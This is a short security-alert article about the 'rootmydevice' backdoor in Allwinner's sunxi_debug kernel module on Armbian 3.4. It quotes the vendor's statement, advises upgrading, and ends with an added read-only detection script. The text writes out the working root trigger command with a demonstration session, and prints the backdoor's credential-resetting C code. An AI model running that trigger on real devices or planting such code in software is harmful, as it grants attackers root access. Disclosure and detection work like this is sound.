About the backdoor found in Armbian's kernel 3.4

Last updated at Posted at 2016-05-13

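With this backdoor present, it appears that any process, running under any UID, can become root by running the command echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug, as long as it has access to /proc. In other words, if a service exposed on the network meets these conditions, it may be possible to execute commands as root remotely. How to verify it is described here (excerpt below):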

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

The problematic code is here (excerpt below):

        if(!strncmp("rootmydevice",(char*)buf,12)){
                cred = (struct cred *)__task_cred(current);
                cred->uid = 0;
                cred->gid = 0;
                cred->suid = 0;
                cred->euid = 0;
                cred->euid = 0;
                cred->egid = 0;
                cred->fsuid = 0;
                cred->fsgid = 0;
                printk("now you are root\n");
        }

The comment from Allwinner, who wrote this code, is here (excerpt below):

Allwinner Technology committed to resolving Linux Kernel software issue

Zhuhai, China - Allwinner Technology.Co.Ltd (SHE: CN:300458) is working with its device manufacturers to fix a current software issue. We are aware that code, which was supplied to device manufacturers for the purpose of developing products, should have been removed prior to shipping. We recommend that anyone who is concerned about this issue should contact the relevant device manufacturer.

In relation to the source code on Github, it is released for the open source community only and not for shipping certain devices. Since a debugging function is not needed it has subsequently been removed.

Allwinner is committed to producing quality SoC’s with security a key priority. We are currently working hard to address this issue and revising our current processes so we can continue to evolve our range of SoC’s in the future.

This can reportedly be fixed with apt-get update/upgrade, so anyone who needs to act should do so promptly.

the fix is also in Armbian's apt repo so please upgrade now (apt-get update/upgrade or start with a fresh OS image) if you're affected!
-- from Armbian - Security Alert for Allwinner sun8i (H3/A83T/H8)
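To check whether a system exposes the entry described above without writing the trigger string to it, the script below only inspects the path and its mode bits. It is an added example, not part of the original article or of Armbian's tooling; the function names and status strings are hypothetical.

```shell
#!/bin/sh
# Added example: read-only check for the sunxi_debug procfs entry.
# Nothing is written to the entry, so running this does not change credentials.

# Print "absent", "present-world-writable" or "present-restricted".
# $1 is the procfs root; it is a parameter so the check can be run
# against a constructed directory tree as well as the real /proc.
check_sunxi_debug() {
    proc_root="${1:-/proc}"
    node="$proc_root/sunxi_debug/sunxi_debug"

    if [ ! -e "$node" ]; then
        echo "absent"
        return 0
    fi

    # Keep only the 10-character mode string (type + rwx triplets);
    # character 9 is the write bit for "other", i.e. any UID.
    perm=$(ls -ld "$node" | cut -c1-10)
    case "$perm" in
        ????????w?) echo "present-world-writable" ;;
        *)          echo "present-restricted" ;;
    esac
    return 0
}

# Return 0 if the kernel release string belongs to the 3.4 series
# named in the article (3.4, 3.4.x or 3.4-suffix), 1 otherwise.
kernel_is_3_4() {
    case "$1" in
        3.4|3.4.*|3.4-*) return 0 ;;
        *)               return 1 ;;
    esac
}

# Report for the running system.
release=$(uname -r)
status=$(check_sunxi_debug /proc)
if kernel_is_3_4 "$release"; then
    series="3.4 series"
else
    series="not 3.4 series"
fi
echo "sunxi_debug entry: $status (kernel $release, $series)"
```

Any result other than "absent" means the debug entry is present in the running kernel and the upgrade described above should be applied.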
